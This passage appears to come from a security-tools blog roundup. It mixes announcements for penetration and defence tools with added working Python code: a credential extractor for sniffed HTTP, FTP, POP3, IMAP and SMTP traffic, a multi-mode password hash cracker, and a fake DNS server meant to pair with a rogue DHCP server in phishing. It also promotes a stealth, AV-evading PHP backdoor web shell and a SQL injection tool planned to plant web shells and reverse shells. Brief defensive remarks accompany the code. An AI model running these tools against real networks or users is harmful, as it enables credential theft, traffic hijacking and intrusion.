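    m = re.search(r"^AUTH LOGIN\r?\n([A-Za-z0-9+/=]+)\r?\n([A-Za-z0-9+/=]+)", payload, re.M | re.I)
    if m:
        u, p = (base64.b64decode(x).decode("latin-1") for x in m.groups())
        return ("smtp-login", u, p)
    return None


def extract_credentials(dst_port, payload):
    """Dispatch on destination port as a sniffer would; returns (proto, user, pass) or None."""
    if dst_port in (80, 8080):
        return http_basic(payload)
    if dst_port == 21:
        return user_pass(payload, "ftp")
    if dst_port == 110:
        return user_pass(payload, "pop3")
    if dst_port == 143:
        return imap_login(payload)
    if dst_port in (25, 587):
        return smtp_auth(payload)
    return None


if __name__ == "__main__":
    # Constructed client-to-server payloads, one reassembled stream each.
    samples = [
        (80, "GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic YWxpY2U6czNjcjN0\r\n\r\n"),
        (21, "USER bob\r\nPASS hunter2\r\n"),
        (110, "USER carol\r\nPASS p0p3pass\r\n"),
        (143, 'a001 LOGIN "dave" "imap-pw"\r\n'),
        (25, "EHLO mail\r\nAUTH PLAIN AGVyaW4AcGFzc3dvcmQ=\r\n"),
    ]
    for port, data in samples:
        print(port, extract_credentials(port, data))
```

Note that none of these protocols hide anything: Basic auth and AUTH PLAIN are base64, which is encoding, not encryption, and FTP/POP3/IMAP send the password verbatim. The defensive counterpart of this script is requiring TLS (HTTPS, FTPS, POP3S/IMAPS, STARTTLS) so there is nothing for a gateway-side sniffer to decode.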

Download  Password Sniffer Console

[SCIP] Identify, Enumerate & Execute Invisible ASP.NET Controls


SCIP is an OWASP ZAP extension designed to assess the security of ASP.NET and Mono applications by abusing platform-specific behaviors and misconfigurations.

The extension currently supports the following features:

  • Identify the existence of invisible, commented-out and disabled server-side web controls in ASP.NET, passively (!).
  • Identify which ASP.NET security configuration is active on each page (EventValidation, MAC), and in which cases the invisible controls are exploitable, passively (!).
  • Enumerate the names of invisible controls using built-in, customizable dictionaries of ASP.NET naming conventions.
  • Rebuild the event validation whenever possible (MAC=off).
  • Execute invisible controls when either of the security features is turned OFF, or when there is a server-side callback implementation flaw.
  • Execute disabled and commented-out controls regardless of the security settings.
  • Support additional manual techniques for executing controls despite the security features.

The extension can be obtained from the project's website or from ZAP's built-in marketplace.

[SSLyze v0.6] SSL Server Configuration Scanning Tool


SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify misconfigurations affecting their SSL servers.

Features
  • SSL 2.0/3.0 and TLS 1.0/1.1/1.2 compatibility
  • Performance testing: session resumption and TLS tickets support
  • Security testing: weak cipher suites, insecure renegotiation, CRIME and THC-SSL-DOS attacks
  • Server certificate validation
  • Support for StartTLS with SMTP and XMPP, and traffic tunneling through an HTTPS proxy
  • Client certificate support for servers performing mutual authentication
  • Scan results can be written to an XML file for further processing
New in v0.6:
  • Added support for Server Name Indication; see --sni
  • Partial results are returned when the server requires client authentication but no client certificate was provided
  • Preliminary IPv6 support
  • Various bug fixes and better support for client authentication and HTTPS tunneling

You can download SSLyze v0.6 here:

Linux/OS X: sslyze-0.6_src.zip
Windows 7/Python 32-bit: sslyze-0.6_Windows7_Python32.zip
Windows 7/Python 64-bit: sslyze-0.6_Windows7_Python64.zip

Or read more here.

[Evasi0n] Removing the jailbreak from an iPhone/iPod touch/iPad


Jailbreaking is not necessarily illegal (at least not in the United States), but it is undoubtedly a practice frowned upon by Apple. If you want to take your mobile device to a repair shop, you should first remove the jailbreak.



The evad3rs (authors of the evasi0n untethered jailbreak tool) have said that the jailbreak does not affect iPhones in any way; for example, it does not cause higher battery consumption or anything similar.

However, the jailbreak enables some features that could eventually lead to unwanted behavior on the device. And if one day you have to take the iPhone, iPod touch or iPad to a repair shop, Apple will most likely refuse warranty service if it discovers the device is jailbroken.

In that case, you will need to remove the jailbreak. To do so, follow the evad3rs' advice:

“If you ever decide you want to undo the jailbreak, you can connect your device to the computer, make a full backup with iTunes, click 'restore' in iTunes to wipe the device, and load the backup when asked. All your App Store apps and other data will be kept, as usual.”

Evasi0n

[SHA256 Salted Hash Kracker] Tool to Crack your Salted SHA256 Hash


SHA256 Salted Hash Kracker is a free tool to crack and recover your lost password from a salted SHA256 hash.


These days most websites and applications use salted SHA256 hashes to prevent them from being cracked easily with precomputed hash tables such as those built by RainbowCrack. In such cases, 'SHA256 Salted Hash Kracker' will help you recover your lost password from the salted SHA256 hash.
It uses a dictionary-based cracking method, which keeps the cracking operation simple. By default a small dictionary file is included, but you can find good collections of password dictionaries (also called wordlists) here & here.

Though it supports only the dictionary crack method, you can easily use tools like Crunch or Cupp to generate a brute-force-style or custom password list file and then use it with 'SHA256 Salted Hash Kracker'.

It also lets you specify the salt position, either at the beginning of the password [sha256(salt+password)] or at the end [sha256(password+salt)]. If you want to perform plain SHA256 hash cracking without a salt, just leave the Salt field blank.

It works on both 32-bit & 64-bit Windows platforms starting from Windows XP to Windows 8.
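As an added example covering the recovery modes of Hash Kracker Console above and the salt placement of SHA256 Salted Hash Kracker (my own code, not the tools'): dictionary, hybrid and pattern (mask) candidate generators feeding one cracking loop that handles sha256(salt+password), sha256(password+salt) and the unsalted case, with the algorithm picked from the digest length. The wordlist and the target hashes are constructed by hashing known strings.

```python
import hashlib
import itertools
import string

# Added example, not the tools' own code: the Hash Kracker Console recovery modes
# (dictionary, hybrid, pattern brute force) and the salt placement handled by SHA256
# Salted Hash Kracker, in one cracking loop. Targets below are constructed.
ALGORITHMS = ("md5", "sha1", "sha256", "sha384", "sha512")
MASK_SETS = {"?d": string.digits, "?l": string.ascii_lowercase,
             "?u": string.ascii_uppercase, "?s": "!@#$%^&*"}


def guess_algorithm(hexdigest):
    """Pick the unsalted algorithm by digest length (32/40/64/96/128 hex chars)."""
    by_len = {hashlib.new(a).digest_size * 2: a for a in ALGORITHMS}
    return by_len.get(len(hexdigest))


def digest(algorithm, candidate, salt="", salt_first=True):
    """hash(salt+password) when salt_first, else hash(password+salt); unsalted when salt is empty."""
    data = (salt + candidate) if salt_first else (candidate + salt)
    return hashlib.new(algorithm, data.encode()).hexdigest()


def dictionary(words):
    """Dictionary crack: try each word as-is."""
    yield from words


def hybrid(words, digits=2):
    """Hybrid crack: each word, then the word followed by 0..10**digits-1 (padded and not)."""
    for w in words:
        yield w
        for n in range(10 ** digits):
            yield w + str(n)
            yield w + str(n).zfill(digits)


def mask(pattern):
    """Pattern brute force: '?u?l?d?s' -> every string drawn from the per-position sets."""
    sets = []
    i = 0
    while i < len(pattern):
        tok = pattern[i:i + 2]
        if tok in MASK_SETS:
            sets.append(MASK_SETS[tok])
            i += 2
        else:
            sets.append(pattern[i])        # literal character
            i += 1
    for combo in itertools.product(*sets):
        yield "".join(combo)


def crack(target_hex, candidates, salt="", salt_first=True, algorithm=None):
    """Return the first candidate whose digest matches target_hex, or None."""
    target = target_hex.lower()
    algorithm = algorithm or guess_algorithm(target)
    if algorithm is None:
        raise ValueError("unrecognised digest length %d" % len(target))
    for c in candidates:
        if digest(algorithm, c, salt, salt_first) == target:
            return c
    return None


if __name__ == "__main__":
    words = ["password", "letmein", "summer"]            # constructed wordlist
    t1 = hashlib.sha256(b"s4ltsummer").hexdigest()       # sha256(salt+password)
    print(crack(t1, dictionary(words), salt="s4lt"))      # summer
    t2 = hashlib.md5(b"letmein07").hexdigest()
    print(crack(t2, hybrid(words)))                       # letmein07
    t3 = hashlib.sha1(b"Ab1!").hexdigest()
    print(crack(t3, mask("?u?l?d?s")))                    # Ab1!
```

Getting the salt position wrong silently yields no match, so when a dictionary run comes back empty, re-run it with the other placement before concluding the password is not in the list. Unsalted, fast hashes like these are exactly what GPU crackers such as the oclHashcat releases above chew through; for stored credentials, use a slow, salted construction (md5crypt, sha512crypt, bcrypt) instead.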



[JSQL v0.3] Java Tool for Automatic Database Injection

jSQL Injection is a lightweight application used to extract database information from a remote server.

jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).




Version 0.2 features:
  • GET, POST, header, cookie methods
  • normal, error based, blind, time based algorithms
  • automatic best algorithm selection
  • thread control (start/pause/resume/stop)
  • expose URL calls
  • simple evasion
  • data retrieving progression bar
  • proxy setting
  • supports MySQL

The next release, v0.3, will include:
+ distant file reading [sqli]
+ webshell deposit [sqli]
+ terminal to run webshell commands [gui]
+ configuration backup [gui]
+ Updates checking [gui]
+ user interface tweaks [gui]
Next work:
+ distant table writing [sqli]
+ distant file writing [sqli]
+ reverse tcp shell deposit [sqli]
+ right elevation [sqli]
+ speed increase (non encoding pass): 50% faster [sqli]
+ control all running tasks in a tab [gui]
# speed test comparison with other injection tools [dev]
# automatic code testing (JUnit) [dev]
# wiki pages [site]


[Pentoo 2013.0 RC1.1] Security-Focused live CD based on Gentoo

Pentoo is a security-focused live CD based on Gentoo It's basically a Gentoo install with lots of customized tools, customized kernel, and much more.

Pentoo 2013.0 RC1.1 features :
  • Changes saving
  • CUDA/OpenCL Enhanced cracking software
    • John the ripper
    • Hashcat Suite of tools
  • Kernel 3.7.5 and all needed patches for injection
  • XFCE 4.10
  • All the latest tools and a responsive development team!
Here is a non-exhaustive list of the features currently included :
  • Hardened Kernel with aufs patches
  • Backported Wifi stack from latest stable kernel release
  • Module loading support à la Slax
  • Changes saving on usb stick
  • XFCE4 wm
  • Cuda/OPENCL cracking support with development tools
  • System updates once it is installed to disk

[Snort 2.9.4.1] Network Intrusion Detection System


Snort is a free and open source network intrusion prevention system (NIPS) and network intrusion detection system (NIDS). Snort can perform real-time traffic analysis and packet logging on Internet Protocol (IP) networks, including protocol analysis, content searching, and content matching.

The program can also be used to detect probes or attacks, including, but not limited to, operating system fingerprinting attempts, common gateway interface (CGI) attacks, buffer overflows, server message block (SMB) probes, and stealth port scans. Snort can be run in three main modes: sniffer, packet logger, and network intrusion detection.

Improvements in Snort 2.9.4.1
  • Updated File processing for partial HTTP content and MIME attachments.
  • Addition of new config option max_attribute_services_per_host and improve memory usage within attribute table.
  • Handle excessive overlaps in frag3.
  • Stream API updates to return session key for a session.
  • Reduce false positives for TCP window slam events.
  • Updates to provide better encoding for TCP packets generated for respond and react.
  • Disable non-Ethernet decoders by default for performance reasons. If needed, use --enable-non-ether-decoders with configure.

[SSL Certificate Downloader] Command-line Tool to grab SSL Certificate from Server Remotely




SSL Cert Downloader is a free command-line tool to grab the SSL certificate from a server remotely.

It can be used to download the certificate from any SSL-enabled service, including

  • HTTPS (443)
  • LDAPS (636)
  • SMTPS (465)
  • POP3S (995)
  • IMAPS (993)

You can specify either the IP address or the host name of the server. You can also enter a custom port, which is useful when the SSL service runs on a non-standard port.


Once the certificate has been downloaded from the server it is saved to the specified file. Later you can just double-click the saved file to view the SSL certificate.

It is very easy to use, and being a command-line tool makes it easy to automate through scripting.
It is fully portable and works on all Windows versions from Windows XP to Windows 8.
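An added example in Python (not the tool's own code) of the same operation: connect to host:port, complete the TLS handshake with verification deliberately disabled (you are fetching the certificate, so you cannot trust it yet), and save the leaf certificate as PEM or DER alongside its SHA256 fingerprint. The argument names and the sample DER bytes used in the self-check are assumptions for this demo.

```python
import argparse
import hashlib
import ipaddress
import socket
import ssl


def fetch_server_cert_der(host: str, port: int, timeout: float = 10.0) -> bytes:
    """Open a TLS connection and return the server's leaf certificate in DER form.
    Verification is off on purpose: self-signed or untrusted certs must still download."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    try:                                # SNI must be a DNS name, so skip it for IP literals
        ipaddress.ip_address(host)
        sni = None
    except ValueError:
        sni = host
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=sni) as tls:
            der = tls.getpeercert(binary_form=True)
    if not der:
        raise RuntimeError("server presented no certificate")
    return der


def der_to_pem(der: bytes) -> str:
    """Base64-armoured PEM, the form Windows opens in its certificate viewer."""
    return ssl.DER_cert_to_PEM_cert(der)


def pem_to_der(pem: str) -> bytes:
    return ssl.PEM_cert_to_DER_cert(pem)


def sha256_fingerprint(der: bytes) -> str:
    """Colon-separated SHA256 fingerprint, as browsers and `openssl x509 -fingerprint` show it."""
    digest = hashlib.sha256(der).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def save_cert(der: bytes, path: str, as_pem: bool = True) -> None:
    """Write the certificate as PEM text or raw DER bytes."""
    if as_pem:
        with open(path, "w") as fh:
            fh.write(der_to_pem(der))
    else:
        with open(path, "wb") as fh:
            fh.write(der)


def main() -> None:
    ap = argparse.ArgumentParser(description="Grab a TLS server certificate")
    ap.add_argument("host")
    ap.add_argument("port", type=int, help="443, 636, 465, 995, 993 or a custom port")
    ap.add_argument("outfile")
    ap.add_argument("--der", action="store_true", help="save DER instead of PEM")
    args = ap.parse_args()
    der = fetch_server_cert_der(args.host, args.port)
    save_cert(der, args.outfile, as_pem=not args.der)
    print("SHA256 fingerprint:", sha256_fingerprint(der))


if __name__ == "__main__":
    main()
```

Two caveats a practitioner hits immediately: this only works for implicit-TLS ports like the five listed above; a STARTTLS service (SMTP on 25/587, LDAP on 389, IMAP on 143) needs the plaintext STARTTLS exchange first. And getpeercert returns only the leaf; to capture the full chain use openssl s_client -showcerts, or pin on the leaf fingerprint printed here.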





[Ghost Phisher Tool] Fake DNS Server, Fake DHCP Server and Fake HTTP server


Ghost Phisher is a computer security application that comes with a built-in Fake DNS Server, Fake DHCP Server and Fake HTTP server, and also has an integrated area for automatic capture and logging of HTTP form-method credentials to a database. The program can be used as a honeypot, to serve DHCP or DNS requests, or for phishing attacks.

Requirements:
  • python
  • python-qt4
  • dhcp3-server
  • ettercap-gtk
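What the "Fake DNS Server" component does at the wire level, as an added Python example (not Ghost Phisher's code): parse an incoming UDP query, echo the question back with the response bit set, and attach a single A record pointing every name at the attacker's address. The query builder exists only so the demo can run offline; the 10.0.0.1 answer and port 53 binding are assumptions.

```python
import socket
import struct

QTYPE_A = 1


def _read_name(data: bytes, off: int):
    """Decode an uncompressed QNAME; returns (dotted name, offset after the name)."""
    labels = []
    while True:
        ln = data[off]
        off += 1
        if ln == 0:
            break
        if ln & 0xC0:
            raise ValueError("compression pointers are not expected in a query")
        labels.append(data[off:off + ln].decode("ascii", "replace"))
        off += ln
    return ".".join(labels), off


def parse_query(packet: bytes):
    """Return (txid, qname, qtype, qclass, raw question section)."""
    if len(packet) < 12:
        raise ValueError("truncated DNS header")
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", packet[:12])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question query")
    qname, off = _read_name(packet, 12)
    qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
    return txid, qname, qtype, qclass, packet[12:off + 4]


def build_response(query: bytes, answer_ip: str, ttl: int = 60):
    """Answer every A/IN question with answer_ip; other types get an empty NOERROR
    reply so the client falls back to IPv4. Returns (response bytes, queried name)."""
    txid, qname, qtype, qclass, question = parse_query(query)
    rr, ancount = b"", 0
    if qtype == QTYPE_A and qclass == 1:
        # 0xC00C is a pointer to offset 12, i.e. the QNAME already in the question
        rr = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, 1, ttl, 4) + socket.inet_aton(answer_ip)
        ancount = 1
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, ancount, 0, 0)  # QR=1 RD=1 RA=1 RCODE=0
    return header + question + rr, qname


def build_query(name: str, txid: int = 0x1234, qtype: int = QTYPE_A) -> bytes:
    """Construct a standard recursive query (only used for the offline demo/test)."""
    qname = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", qtype, 1)


def answer_ip_of(response: bytes):
    """Read the A record back out of a build_response() packet (None if no answer)."""
    ancount = struct.unpack("!H", response[6:8])[0]
    return socket.inet_ntoa(response[-4:]) if ancount else None


def serve(bind_ip: str = "0.0.0.0", port: int = 53, answer_ip: str = "10.0.0.1") -> None:
    """Blocking UDP loop: every A lookup from any client resolves to answer_ip."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_ip, port))
    while True:
        data, client = sock.recvfrom(512)
        try:
            resp, name = build_response(data, answer_ip)
        except ValueError:
            continue  # malformed or multi-question packet: ignore it
        print("%s asked for %s -> %s" % (client[0], name, answer_ip))
        sock.sendto(resp, client)


if __name__ == "__main__":
    serve()  # needs root for port 53; pair with a rogue DHCP lease to become the victim's resolver
```

This is why a rogue DHCP server is the other half of the kit: handing out this host as the resolver is what makes every victim's "login.example.com" land on the fake HTTP server. On the defensive side, the rewrite is visible as an answer whose TXID and question match but whose A record disagrees with a trusted resolver, which is exactly the check a DNSSEC-validating or DoH client performs.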


http://adf.ly/145t5I

[Hook Analyser v2.4] Application (and Malware) Analysis tool


Application (and Malware) Analysis tool. Hook Analyser is a hooking tool that can help in reversing applications and analysing malware.


Changelog v2.4
  • Hook Analyser can now analyse DLLs. (Part of the Static Malware Analysis Module)
  • The deep trace functionality has been improved significantly, and now it supports searching (and logging) for traces such as Shellcodes, Filenames, WinSockets, Compiler Traces etc.(Part of the Static Malware Analysis Module)
  • Exe extractor – This is one of the features which is useful for incident handlers; essentially it allows dumping of executables from process/s, which could then be analysed using Hook Analyser, Malware Analyser or other tools for anomaly checks. (New module added)
  • The static malware analysis has been further improved, and new features have been added. I will let you explore this.(Part of the Static Malware Analysis Module)
  • Minor bug fixes.
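The two changelog items above, dumping executables out of a process and searching the result for traces such as filenames and WinSock usage, as an added Python example (not Hook Analyser's code). It scans a raw buffer for MZ headers, validates each through e_lfanew to the PE signature and optional-header magic, carves SizeOfImage bytes, and runs a small regex triage over the carved image. The sample dump, its strings and the trace patterns are constructed for the demo.

```python
import re
import struct

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def _check_candidate(buf: bytes, idx: int):
    """Validate an 'MZ' at idx as a PE image header; return header facts or None."""
    if idx + 0x40 > len(buf):
        return None
    e_lfanew = struct.unpack_from("<I", buf, idx + 0x3C)[0]
    pe = idx + e_lfanew
    # sanity: the PE header follows the DOS header and is not absurdly far away
    if e_lfanew < 0x40 or e_lfanew > 0x1000 or pe + 24 + 64 > len(buf):
        return None
    if buf[pe:pe + 4] != b"PE\x00\x00":
        return None
    machine, nsections, _ts, _sym, _nsym, opt_size, chars = struct.unpack_from("<HHIIIHH", buf, pe + 4)
    if opt_size < 64:
        return None
    opt = pe + 24
    magic = struct.unpack_from("<H", buf, opt)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        return None
    entry = struct.unpack_from("<I", buf, opt + 16)[0]
    size_of_image = struct.unpack_from("<I", buf, opt + 56)[0]  # same offset in PE32 and PE32+
    return {"offset": idx, "machine": machine, "sections": nsections,
            "is_dll": bool(chars & 0x2000), "pe32plus": magic == PE32PLUS_MAGIC,
            "entry_rva": entry, "size_of_image": size_of_image}


def find_pe_images(buf: bytes):
    """Locate every PE image in a memory dump / unpacked region; decoys are filtered out."""
    hits, idx = [], buf.find(b"MZ")
    while idx != -1:
        hit = _check_candidate(buf, idx)
        if hit:
            hits.append(hit)
        idx = buf.find(b"MZ", idx + 1)
    return hits


def carve(buf: bytes, hit: dict) -> bytes:
    """Cut the image out. SizeOfImage is the mapped size, which is what a memory dump
    holds; a disk-layout carve would sum the sections' raw sizes instead."""
    return buf[hit["offset"]:hit["offset"] + hit["size_of_image"]]


# constructed trace patterns in the spirit of "Filenames, WinSockets" searches
TRACE_PATTERNS = {
    "filename": re.compile(rb"[A-Za-z]:\\[\x20-\x7e]{1,200}?\.(?:exe|dll|bat|ps1)", re.I),
    "winsock": re.compile(rb"ws2_32\.dll|WSAStartup|WSASocket|WSAConnect|getaddrinfo", re.I),
    "url": re.compile(rb"https?://[\x21-\x7e]{4,200}", re.I),
}


def find_traces(blob: bytes):
    """Cheap static triage: which interesting strings does the carved image carry?"""
    return {name: sorted({m.group(0).decode("ascii", "replace") for m in pat.finditer(blob)})
            for name, pat in TRACE_PATTERNS.items()}


def build_sample_dump() -> bytes:
    """Constructed memory dump: zero padding with a decoy 'MZ', then a minimal PE32
    image (one section) whose body holds a few suspicious strings."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew
    coff = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, 0x1000)                      # AddressOfEntryPoint
    struct.pack_into("<I", opt, 56, 0x2000)                      # SizeOfImage
    struct.pack_into("<I", opt, 60, 0x1000)                      # SizeOfHeaders
    section = b".text\x00\x00\x00" + struct.pack("<IIIIIIHHI", 0x1000, 0x1000, 0x1000, 0x1000,
                                                 0, 0, 0, 0, 0x60000020)
    headers = bytes(dos) + coff + bytes(opt) + section
    headers += b"\x00" * (0x1000 - len(headers))
    body = (b"WSAStartup\x00ws2_32.dll\x00C:\\Users\\victim\\AppData\\update.exe\x00"
            b"http://203.0.113.7/gate.php\x00")
    body += b"\x00" * (0x1000 - len(body))
    junk = bytearray(256)
    junk[10:12] = b"MZ"   # decoy: its e_lfanew reads as 0 and fails the sanity check
    return bytes(junk) + headers + body + b"\x00" * 64


if __name__ == "__main__":
    dump = build_sample_dump()
    for h in find_pe_images(dump):
        print(h)
        print(find_traces(carve(dump, h)))
```

An image carved from memory is laid out by SectionAlignment, not FileAlignment, so it will not run as-is; tools that dump executables from processes typically rewrite each section's PointerToRawData to its VirtualAddress before the file is fed to a static analyser.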

More Information:

[Weevely] PHP Stealth Tiny Web Shell


Weevely is a stealth PHP web shell that provides a telnet-like console. It is an essential tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free-hosted ones.

Weevely is currently included in BackTrack, BackBox and the other major penetration-testing Linux distributions.

  • More than 30 modules to automate administration and post-exploitation tasks:
    • Execute commands and browse the remote filesystem, even under PHP security restrictions
    • Audit common server misconfigurations
    • Run SQL console pivoting on target machine
    • Proxy your HTTP traffic through target
    • Mount target filesystem to local mount point
    • Simple file transfer from and to target
    • Spawn reverse and direct TCP shells
    • Bruteforce SQL accounts through target system
    • Run port scans from target machine
    • And so on..
  • Backdoor communications are hidden in HTTP Cookies
  • Communications are obfuscated to bypass NIDS signature detection
  • Polymorphic backdoor PHP code is obfuscated to evade HIDS/AV detection
You can download Weevely v1.0 here:


Or read more here.